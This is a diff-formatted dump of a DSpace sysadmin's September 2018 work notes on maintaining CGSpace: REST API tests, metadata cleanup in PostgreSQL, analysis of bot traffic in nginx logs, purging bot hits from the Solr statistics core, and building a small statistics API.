  • +
+

2018-09-10

+
    +
  • Playing with strest to test the DSpace REST API programmatically
  • +
  • For example, given this test.yaml:
  • +
+
version: 1
+
+requests:
+  test:
+    method: GET
+    url: https://dspacetest.cgiar.org/rest/test
+    validate:
+      raw: "REST api is running."
+
+  login:
+    url: https://dspacetest.cgiar.org/rest/login
+    method: POST
+    data:
+      json: {"email":"test@dspace","password":"thepass"}
+
+  status:
+    url: https://dspacetest.cgiar.org/rest/status
+    method: GET
+    headers:
+      rest-dspace-token: Value(login)
+
+  logout:
+    url: https://dspacetest.cgiar.org/rest/logout
+    method: POST
+    headers:
+      rest-dspace-token: Value(login)
+
+# vim: set sw=2 ts=2:
+
    +
  • Works pretty well, though the DSpace logout always returns an HTTP 415 error for some reason
  • +
  • We could eventually use this to test sanity of the API for creating collections etc
  • +
  • A user is getting an error in her workflow:
  • +
+
2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step: 
+org.dspace.authorize.AuthorizeException: Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:2 by user 3819
+
+
$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
+$ dspace community-filiator --set -p 10568/97114 -c 10568/35409
+$ dspace community-filiator --set -p 10568/97114 -c 10568/3112
+
    +
  • Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:
  • +
+
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
+UPDATE 1
+update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
+UPDATE 23
+update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
+UPDATE 1
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
+DELETE 17
+update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
+UPDATE 15
+
    +
  • Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)
  • +
  • The current cg.identifier.status field will become “Access rights” and dc.rights will become “Usage rights”
  • +
  • I have some work in progress on the 5_x-rights branch
  • +
  • Linode said that CGSpace (linode18) had a high CPU load earlier today
  • +
  • When I looked, I see it’s the same Russian IP that I noticed last month:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1459 157.55.39.202
+   1579 95.108.181.88
+   1615 157.55.39.147
+   1714 66.249.64.91
+   1924 50.116.102.77
+   3696 157.55.39.106
+   3763 157.55.39.148
+   4470 70.32.83.92
+   4724 35.237.175.180
+  14132 5.9.6.51
+
    +
  • And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):
  • +
+
# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10 
+14133
+
    +
  • The user agent is still the same:
  • +
+
Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+
    +
  • I added .*crawl.* to the Tomcat Session Crawler Manager Valve, so I’m not sure why the bot is creating so many sessions…
  • +
  • I just tested that user agent on CGSpace and it does not create a new session:
  • +
+
$ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
+GET / HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 10 Sep 2018 20:43:04 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+
    +
  • I will have to keep an eye on it and perhaps add it to the list of “bad bots” that get rate limited
  • +
+

2018-09-12

+
    +
  • Merge AReS explorer changes to nginx config and deploy on CGSpace so CodeObia can start testing more
  • +
  • Re-create my local Docker container for PostgreSQL data, but using a volume for the database data:
  • +
+
$ sudo docker volume create --name dspacetest_data
+$ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+
    +
  • Sisay is still having problems with the controlled vocabulary for top authors
  • +
  • I took a look at the submission template and Firefox complains that the XML file is missing a root element
  • +
  • I guess it’s because Firefox is receiving an empty XML file
  • +
  • I told Sisay to run the XML file through tidy
  • +
  • More testing of the access and usage rights changes
  • +
+

2018-09-13

+
    +
  • Peter was communicating with Altmetric about the OAI mapping issue for item 10568/82810 again
  • +
  • Altmetric said it was somehow related to the OAI dateStamp not getting updated when the mappings changed, but I said that back in 2018-07 when this happened it was because the OAI was actually just not reflecting all the item’s mappings
  • +
  • After forcing a complete re-indexing of OAI the mappings were fine
  • +
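  • For reference, a full OAI re-import that refreshes stale mappings is something like this (the -c flag clears the OAI cache before importing, if I remember it correctly):

$ dspace oai import -c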
  • The dateStamp is most probably only updated when the item’s metadata changes, not its mappings, so if Altmetric is relying on that we’re in a tricky spot
  • +
  • We need to make sure that our OAI isn’t publicizing stale data… I was going to post something on the dspace-tech mailing list, but never did
  • +
  • Linode says that CGSpace (linode18) has had high CPU for the past two hours
  • +
  • The top IP addresses today are:
  • +
+
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E "13/Sep/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                
+     32 46.229.161.131
+     38 104.198.9.108
+     39 66.249.64.91
+     56 157.55.39.224
+     57 207.46.13.49
+     58 40.77.167.120
+     78 169.255.105.46
+    702 54.214.112.202
+   1840 50.116.102.77
+   4469 70.32.83.92
+
    +
  • And the top two addresses seem to be re-using their Tomcat sessions properly:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
+7
+$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
+2
+
    +
  • So I’m not sure what’s going on
  • +
  • Valerio asked me if there’s a way to get the page views and downloads from CGSpace
  • +
  • I said no, but that we might be able to piggyback on the Atmire statlet REST API
  • +
  • For example, when you expand the “statlet” at the bottom of an item like 10568/97103 you can see the following request in the browser console:
  • +
+
https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
+
    +
  • That JSON file has the total page views and item downloads for the item…
  • +
  • Abenet forwarded a request by CIP that item thumbnails be included in RSS feeds
  • +
  • I had a quick look at the DSpace 5.x manual and it doesn’t seem that this is possible (you can only add metadata)
  • +
  • Testing the new LDAP server that CGNET says will be replacing the old one: it doesn’t seem that they are using the global catalog on port 3269 anymore, as now only 636 is open
  • +
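  • A quick way to check which LDAP ports are actually reachable on the new server (hostname below is a placeholder, not the real one):

$ nc -zv ldap.example.cgiar.org 636
$ nc -zv ldap.example.cgiar.org 3269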
  • I did a clean deploy of DSpace 5.8 on Ubuntu 18.04 with some stripped down Tomcat 8 configuration and actually managed to get it up and running without the autowire errors that I had previously experienced
  • +
  • I realized that it always works on my local machine with Tomcat 8.5.x, but not when I do the deployment from Ansible in Ubuntu 18.04
  • +
  • So there must be something in my Tomcat 8 server.xml template
  • +
  • Now I re-deployed it with the normal server template and it’s working, WTF?
  • +
  • Must have been something like an old DSpace 5.5 file in the spring folder… weird
  • +
  • But yay, this means we can update DSpace Test to Ubuntu 18.04, Tomcat 8, PostgreSQL 9.6, etc…
  • +
+

2018-09-14

+
    +
  • Sisay uploaded the IITA records to CGSpace, but forgot to remove the old Handles
  • +
  • I explicitly told him not to forget to remove them yesterday!
  • +
+

2018-09-16

+
    +
  • Add the DSpace build.properties as a template into my Ansible infrastructure scripts for configuring DSpace machines
  • +
  • One stupid thing there is that I add all the variables in a private vars file, which is apparently higher precedence than host vars, meaning that I can’t override them (like SMTP server) on a per-host basis
  • +
  • Discuss access and usage rights with Peter
  • +
  • I suggested that we leave access rights (cg.identifier.access) as it is now, with “Open Access” or “Limited Access”, and then simply re-brand that as “Access rights” in the UIs and relevant drop downs
  • +
  • Then we continue as planned to add dc.rights as “Usage rights”
  • +
+

2018-09-17

+
    +
  • Skype meeting with CGSpace team in Addis
  • +
  • Change cg.identifier.status “Access rights” options to: +
      +
    • Open Access→Unrestricted Access
    • +
    • Limited Access→Restricted Access
    • +
    • Metadata Only
    • +
    +
  • +
  • Update these immediately, but talk to CodeObia to create a mapping between the old and new values
  • +
  • Finalize dc.rights “Usage rights” with seven combinations of Creative Commons, plus the others
  • +
  • Need to double check the new CRP community to see why the collection counts aren’t updated after we moved the communities there last week +
      +
    • I forced a full Discovery re-index and now the community shows 1,600 items
    • +
    +
  • +
  • Check if it’s possible to have items deposited via REST use a workflow so we can perhaps tell ICARDA to use that from MEL
  • +
  • Agree that we’ll publicize AReS explorer on the week before the Big Data Platform workshop +
      +
    • Put a link and or picture on the CGSpace homepage saying “Visualized CGSpace research” or something, and post a message on Yammer
    • +
    +
  • +
  • I want to explore creating a thin API to make the item view and download stats available from Solr so CodeObia can use them in the AReS explorer
  • +
  • Currently CodeObia is exploring using the Atmire statlets internal API, but I don’t really like that…
  • +
  • There are some example queries on the DSpace Solr wiki
  • +
  • For example, this query returns 1655 rows for item 10568/10630:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false'
+
    +
  • The id in the Solr query is the item’s database id (get it from the REST API or something)
  • +
  • Next, I adapted a query to get the downloads and it shows 889, which is similar to the number Atmire’s statlet shows, though the query logic here is confusing:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
+
    +
  • According to the SolrQuerySyntax page on the Apache wiki, the [* TO *] syntax just selects a range (in this case all values for a field)
  • +
  • So it seems to be: +
      +
    • type:0 is for bitstreams according to the DSpace Solr documentation
    • +
    • -(bundleName:[*+TO+*]-bundleName:ORIGINAL) seems to be a negative query starting with all documents, subtracting those with bundleName:ORIGINAL, and then negating the whole thing… meaning only documents from bundleName:ORIGINAL?
    • +
    +
  • +
  • What the shit, I think I’m right: the simplified logic in this query returns the same 889:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
+
    +
  • And if I simplify the statistics_type logic the same way, it still returns the same 889!
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view'
+
    +
  • As for item views, I suppose that’s just the same query, minus the bundleName:ORIGINAL:
  • +
+
$ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:0+owningItem:11576&fq=isBot:false&fq=-bundleName:ORIGINAL&fq=statistics_type:view'
+
    +
  • That one returns 766, which is exactly 1655 minus 889…
  • +
  • Also, Solr’s fq is similar to the regular q query parameter, but its results are cached in Solr’s filterCache, so repeated queries with the same filters should be faster
  • +
+

2018-09-18

+
    +
  • I managed to create a simple proof of concept REST API to expose item view and download statistics: cgspace-statistics-api
  • +
  • It uses the Python-based Falcon web framework and talks to Solr directly using the SolrClient library (which seems to have issues in Python 3.7 currently)
  • +
  • After deploying on DSpace Test I can then get the stats for an item using its ID:
  • +
+
$ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
+{
+    "downloads": 2,
+    "id": 110988,
+    "views": 15
+}
+
    +
  • The numbers are different than those that come from Atmire’s statlets for some reason, but as I’m querying Solr directly, I have no idea where their numbers come from!
  • +
  • Moayad from CodeObia asked if I could make the API be able to paginate over all items, for example: /statistics?limit=100&page=1
  • +
  • Getting all the item IDs from PostgreSQL is certainly easy:
  • +
+
dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
+
    +
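  • A paginated version of that query for the API would just use LIMIT and OFFSET, for example (connection parameters and page size here are only illustrative):

$ psql -h localhost -U dspace dspace -c 'SELECT item_id FROM item WHERE in_archive IS TRUE AND withdrawn IS FALSE AND discoverable IS TRUE ORDER BY item_id LIMIT 100 OFFSET 0;'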
  • The rest of the Falcon tooling will be more difficult…
  • +
+

2018-09-19

+ +

2018-09-20

+
    +
  • Contact Atmire to ask how we can buy more credits for future development (#644)
  • +
  • I researched the Solr filterCache size and I found out that the formula for calculating the potential memory use of each entry in the cache is:
  • +
+
((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
+
    +
  • Which means that, for our statistics core with 149 million documents, each entry in our filterCache would use 8.9 GB!
  • +
+
((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
+
+

2018-09-21

+
    +
  • I see that there was a nice optimization to the ImageMagick PDF CMYK detection in the upstream dspace-5_x branch: DS-3664
  • +
  • The fix will go into DSpace 5.10, and we are currently on DSpace 5.8 but I think I’ll cherry-pick that fix into our 5_x-prod branch: +
      +
    • 4e8c7b578bdbe26ead07e36055de6896bbf02f83: ImageMagick: Only execute “identify” on first page
    • +
    +
  • +
  • I think it would also be nice to cherry-pick the fixes for DS-3883, which is related to optimizing the XMLUI item display of items with many bitstreams +
      +
    • a0ea20bd1821720b111e2873b08e03ce2bf93307: DS-3883: Don’t loop through original bitstreams if only displaying thumbnails
    • +
    • 8d81e825dee62c2aa9d403a505e4a4d798964e8d: DS-3883: If only including thumbnails, only load the main item thumbnail.
    • +
    +
  • +
+

2018-09-23

+
    +
  • I did more work on my cgspace-statistics-api, fixing some item view counts and adding indexing via SQLite (I’m trying to avoid having to set up yet another database, user, password, etc) during deployment
  • +
  • I created a new branch called 5_x-upstream-cherry-picks to test and track those cherry-picks from the upstream 5.x branch
  • +
  • Also, I need to test the new LDAP server, so I will deploy that on DSpace Test today
  • +
  • Rename my cgspace-statistics-api to dspace-statistics-api on GitHub
  • +
+

2018-09-24

+
    +
  • Trying to figure out how to get item views and downloads from SQLite in a join
  • +
  • It appears SQLite doesn’t support FULL OUTER JOIN so some people on StackOverflow have emulated it with LEFT JOIN and UNION:
  • +
+
> SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
+LEFT JOIN itemdownloads downloads USING(id)
+UNION ALL
+SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemdownloads downloads
+LEFT JOIN itemviews views USING(id)
+WHERE views.id IS NULL;
+
    +
  • This “works” but the resulting rows are kinda messy so I’d have to do extra logic in Python
  • +
  • Maybe we can use one “items” table with default values and UPSERT (aka insert… on conflict … do update):
  • +
+
sqlite> CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
+sqlite> INSERT INTO items(id, views) VALUES(0, 52);
+sqlite> INSERT INTO items(id, downloads) VALUES(1, 171);
+sqlite> INSERT INTO items(id, downloads) VALUES(1, 176) ON CONFLICT(id) DO UPDATE SET downloads=176;
+sqlite> INSERT INTO items(id, views) VALUES(0, 78) ON CONFLICT(id) DO UPDATE SET views=78;
+sqlite> INSERT INTO items(id, views) VALUES(0, 3) ON CONFLICT(id) DO UPDATE SET downloads=3;
+sqlite> INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE SET downloads=excluded.views;
+
    +
  • This totally works!
  • +
  • Note the special excluded.views form! See SQLite’s lang_UPSERT documentation
  • +
  • Oh nice, I finally finished the Falcon API route to page through all the results using SQLite’s amazing LIMIT and OFFSET support
  • +
  • But when I deployed it on my Ubuntu 16.04 environment I realized Ubuntu’s SQLite is old and doesn’t support UPSERT, so my indexing doesn’t work…
  • +
  • Apparently UPSERT came in SQLite 3.24.0 (2018-06-04), and Ubuntu 16.04 has 3.11.0
  • +
  • Ok this is hilarious, I manually downloaded the libsqlite3 3.24.0 deb from Ubuntu 18.10 “cosmic” and installed it in Ubuntu 16.04, and now the Python indexer.py works
  • +
  • This is definitely a dirty hack, but the list of packages we use that depend on libsqlite3-0 in Ubuntu 16.04 are actually pretty few:
  • +
+
# apt-cache rdepends --installed libsqlite3-0 | sort | uniq
+  gnupg2
+  libkrb5-26-heimdal
+  libnss3
+  libpython2.7-stdlib
+  libpython3.5-stdlib
+
    +
  • I wonder if I could work around this by detecting the SQLite library version, for example on Ubuntu 16.04 after I replaced the library:
  • +
+
# python3
+Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
+[GCC 5.4.0 20160609] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> import sqlite3
+>>> print(sqlite3.sqlite_version)
+3.24.0
+
    +
  • Or maybe I should just bite the bullet and migrate this to PostgreSQL, as it supports UPSERT since version 9.5 and also seems to have my new favorite LIMIT and OFFSET
  • +
  • I changed the syntax of the SQLite stuff and PostgreSQL is working flawlessly with psycopg2… hmmm.
  • +
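  • For example, the same UPSERT pattern in PostgreSQL syntax looks like this (a hedged sketch against the dspacestatistics database created below):

$ psql -h localhost -U dspacestatistics dspacestatistics -c 'INSERT INTO items(id, downloads) VALUES(1, 176) ON CONFLICT(id) DO UPDATE SET downloads=EXCLUDED.downloads;'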
  • For reference, creating a PostgreSQL database for testing this locally (though indexer.py will create the table):
  • +
+
$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
+$ createuser -h localhost -U postgres --pwprompt dspacestatistics
+$ psql -h localhost -U postgres dspacestatistics
+dspacestatistics=> CREATE TABLE IF NOT EXISTS items
+dspacestatistics-> (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0)
+

2018-09-25

+
    +
  • I deployed the DSpace statistics API on CGSpace, but when I ran the indexer it wanted to index 180,000 pages of item views
  • +
  • I’m not even sure how that’s possible, as we only have 74,000 items!
  • +
  • I need to inspect the id values that are returned for views and cross check them with the owningItem values for bitstream downloads…
  • +
  • Also, I could try to check all IDs against the items table to see if they are actually items (perhaps the Solr id field doesn’t correspond with actual DSpace items?)
  • +
  • I want to purge the bot hits from the Solr statistics core, as I am now realizing that I don’t give a shit about tens of millions of hits by Google and Bing indexing my shit every day (at least not in Solr!)
  • +
  • CGSpace’s Solr core has 150,000,000 documents in it… and it’s still pretty fast to query, but it’s really a maintenance and backup burden
  • +
  • DSpace Test currently has about 2,000,000 documents with isBot:true in its Solr statistics core, and the size on disk is 2GB (it’s not much, but I have to test this somewhere!)
  • +
  • According to the DSpace 5.x Solr documentation I can use dspace stats-util -f, so let’s try it:
  • +
+
$ dspace stats-util -f
+
    +
  • The command comes back after a few seconds and I still see 2,000,000 documents in the statistics core with isBot:true
  • +
  • I was just writing a message to the dspace-tech mailing list and then I decided to check the number of bot view events on DSpace Test again, and now it’s 201 instead of 2,000,000, and statistics core is only 30MB now!
  • +
  • I will set the logBots = false property in dspace/config/modules/usage-statistics.cfg on DSpace Test and check if the number of isBot:true events goes up any more…
  • +
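  • Assuming the property is already present in that config, it can be flipped with something like:

$ sed -i 's/^logBots.*/logBots = false/' dspace/config/modules/usage-statistics.cfg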
  • I restarted the server with logBots = false and after it came back up I see 266 events with isBot:true (maybe they were buffered)… I will check again tomorrow
  • +
  • After a few hours I see there are still only 266 view events with isBot:true on DSpace Test’s Solr statistics core, so I’m definitely going to deploy this on CGSpace soon
  • +
  • Also, CGSpace currently has 60,089,394 view events with isBot:true in its Solr statistics core and it is 124GB!
  • +
  • Amazing! After running dspace stats-util -f on CGSpace the Solr statistics core went from 124GB to 60GB, and now there are only 700 events with isBot:true so I should really disable logging of bot events!
  • +
  • I’m super curious to see how the JVM heap usage changes…
  • +
  • I made (and merged) a pull request to disable bot logging on the 5_x-prod branch (#387)
  • +
  • Now I’m wondering if there are other bot requests that aren’t classified as bots because the IP lists or user agents are outdated
  • +
  • DSpace ships a list of spider IPs, for example: config/spiders/iplists.com-google.txt
  • +
  • I checked the list against all the IPs we’ve seen using the “Googlebot” useragent on CGSpace’s nginx access logs
  • +
  • The first thing I learned is that shit tons of IPs in Russia, Ukraine, Ireland, Brazil, Portugal, the US, Canada, etc are pretending to be “Googlebot”…
  • +
  • According to the Googlebot FAQ the domain name in the reverse DNS lookup should contain either googlebot.com or google.com
  • +
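  • A rough shell check of this: pull the IPs claiming to be Googlebot out of the nginx logs and count how many do not reverse-resolve to googlebot.com or google.com (approximate, since failed lookups also count):

$ zcat --force /var/log/nginx/access.log* | grep 'Googlebot' | awk '{print $1}' | sort -u > /tmp/googlebot-ips.txt
$ while read -r ip; do host "$ip"; done < /tmp/googlebot-ips.txt | grep -c -v -E '(googlebot|google)\.com\.$'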
  • In Solr this appears to be an appropriate query that I can maybe use later (returns 81,000 documents):
  • +
+
*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
+
    +
  • I translate that into a delete command using the /update handler:
  • +
+
http://localhost:8081/solr/statistics/update?commit=true&stream.body=<delete><query>*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false</query></delete>
+
    +
  • And magically all those 81,000 documents are gone!
  • +
  • After a few hours the Solr statistics core is down to 44GB on CGSpace!
  • +
  • I did a major refactor and logic fix in the DSpace Statistics API’s indexer.py
  • +
  • Basically, it turns out that using facet.mincount=1 is really beneficial for me because it reduces the size of the Solr result set, reduces the amount of data we need to ingest into PostgreSQL, and the API returns HTTP 404 Not Found for items without views or downloads anyways
  • +
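  • Roughly speaking, the indexer’s download query now looks something like this (the exact fields may differ slightly; the important part is facet.mincount=1 so items with zero downloads are not returned at all):

$ http 'http://localhost:8081/solr/statistics/select?q=type:0&fq=isBot:false&fq=bundleName:ORIGINAL&fq=statistics_type:view&facet=true&facet.field=owningItem&facet.mincount=1&facet.limit=100&facet.offset=0&rows=0&wt=json'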
  • I deployed the new version on CGSpace and now it looks pretty good!
  • +
+
Indexing item views (page 28 of 753)
+...
+Indexing item downloads (page 260 of 260)
+
    +
  • And now it’s fast as hell due to the muuuuch smaller Solr statistics core
  • +
+

2018-09-26

+
    +
  • Linode emailed to say that CGSpace (linode18) was using 30Mb/sec of outward bandwidth for two hours around midnight
  • +
  • I don’t see anything unusual in the nginx logs, so perhaps it was the cron job that syncs the Solr database to Amazon S3?
  • +
  • It could be that the bot purge yesterday changed the core significantly so there was a lot to change?
  • +
  • I don’t see any drop in JVM heap size in CGSpace’s munin stats since I did the Solr cleanup, but this looks pretty good:
  • +
+

Tomcat max processing time week

+
    +
  • I will have to keep an eye on that over the next few weeks to see if things stay as they are
  • +
  • I did a batch replacement of the access rights with my fix-metadata-values.py script on DSpace Test:
  • +
+
$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
+
    +
  • This changes “Open Access” to “Unrestricted Access” and “Limited Access” to “Restricted Access”
  • +
  • After that I did a full Discovery reindex:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    77m3.755s
+user    7m39.785s
+sys     2m18.485s
+
    +
  • I told Peter it’s better to do the access rights before the usage rights because the git branches are conflicting with each other and it’s actually a pain in the ass to keep changing the values as we discuss, rebase, merge, fix conflicts…
  • +
  • Udana and Mia from WLE were asking some questions about their WLE Feedburner feed
  • +
  • It’s pretty confusing, because until recently they were entering issue dates as only YYYY (like 2018) and their feeds were all showing items in the wrong order
  • +
  • I’m not exactly sure what their problem now is, though (confusing)
  • +
  • I updated the dspace-statistics-api to use psycopg2’s execute_values() to insert batches of 100 values into PostgreSQL instead of doing every insert individually
  • +
  • On CGSpace this reduces the total run time of indexer.py from 432 seconds to 400 seconds (most of the time is actually spent in getting the data from Solr though)
  • +
+

2018-09-27

+
    +
  • Linode emailed to say that CGSpace’s (linode19) CPU load was high for a few hours last night
  • +
  • Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "26/Sep/2018:(19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    295 34.218.226.147
+    296 66.249.64.95
+    350 157.55.39.185
+    359 207.46.13.28
+    371 157.55.39.85
+    388 40.77.167.148
+    444 66.249.64.93
+    544 68.6.87.12
+    834 66.249.64.91
+    902 35.237.175.180
+
    +
  • 35.237.175.180 is on Google Cloud
  • +
  • 68.6.87.12 is on Cox Communications in the US (?)
  • +
  • These hosts are not using proper user agents and are not re-using their Tomcat sessions:
  • +
+
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
+5423
+$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
+758
+
    +
  • I will add their IPs to the list of bad bots in nginx so we can add a “bot” user agent to them and let Tomcat’s Crawler Session Manager Valve handle them
  • +
  • I asked Atmire to prepare an invoice for 125 credits
  • +
+

2018-09-29

+
    +
  • I merged some changes to author affiliations from Sisay as well as some corrections to organizational names using smart quotes like Université d’Abomey Calavi (#388)
  • +
  • Peter sent me a list of 43 author names to fix, but it had some encoding errors in names like Belalcázar, John as usual (I will tell him to stop trying to export as UTF-8 because it never seems to work)
  • +
  • I did batch replaces for both on CGSpace with my fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i 2018-09-29-fix-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
+$ ./fix-metadata-values.py -i 2018-09-29-fix-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
+
    +
  • Afterwards I started a full Discovery re-index:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • Linode sent an alert that both CGSpace and DSpace Test were using high CPU for the last two hours
  • +
  • It seems to be Moayad trying to do the AReS explorer indexing
  • +
  • He was sending too many (5 or 10) concurrent requests to the server, but still… why is this shit so slow?!
  • +
+

2018-09-30

+
    +
  • Valerio keeps sending items on CGSpace that have weird or incorrect languages, authors, etc
  • +
  • I think I should just batch export and update all languages…
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2018-09-30-languages.csv with csv;
+
    +
  • Then I can simply delete the “Other” and “other” ones because that’s not useful at all:
  • +
+
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Other';
+DELETE 6
+dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='other';
+DELETE 79
+
    +
  • Looking through the list I see some weird language codes like gh, so I checked out those items:
  • +
+
dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
+ resource_id
+-------------
+       94530
+       94529
+dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2 AND handle.resource_id = item.item_id AND handle.resource_id in (94530, 94529);
+   handle    | item_id
+-------------+---------
+ 10568/91386 |   94529
+ 10568/91387 |   94530
+
    +
  • Those items are from Ghana, so the submitter apparently thought gh was a language… I can safely delete them:
  • +
+
dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
+DELETE 2
+
    +
  • The next issue would be jn:
  • +
+
dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
+ resource_id
+-------------
+       94001
+       94003
+dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2 AND handle.resource_id = item.item_id AND handle.resource_id in (94001, 94003);
+   handle    | item_id
+-------------+---------
+ 10568/90868 |   94001
+ 10568/90870 |   94003
+
    +
  • Those items are about Japan, so I will update them to be ja
  • +
  • Other replacements:
  • +
+
DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
+UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
+UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
+UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
+UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
+UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
+
    +
  • Then there are 12 items with en|hi, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata
  • +
October, 2018

+ +
+

